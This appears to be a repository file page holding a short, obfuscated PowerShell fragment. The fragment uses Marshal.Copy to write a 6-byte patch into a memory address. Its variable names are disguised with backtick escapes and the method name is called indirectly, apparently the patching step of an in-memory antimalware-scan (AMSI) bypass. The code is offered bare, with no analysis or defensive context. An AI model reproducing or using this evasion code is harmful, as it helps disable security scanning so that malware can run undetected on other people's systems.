gggg / test /bb
enotkrutoy's picture
Update test/bb
640f13e verified
raw
history blame
221 Bytes
$namespace = [System.Runtime.InteropServices.Marshal]
$method = 'Copy'
$source = ${PaT`Ch}
$startIndex = 0
$destination = ${addr`E`ss}
$length = 6
$namespace::$method($source, $startIndex, $destination, $length)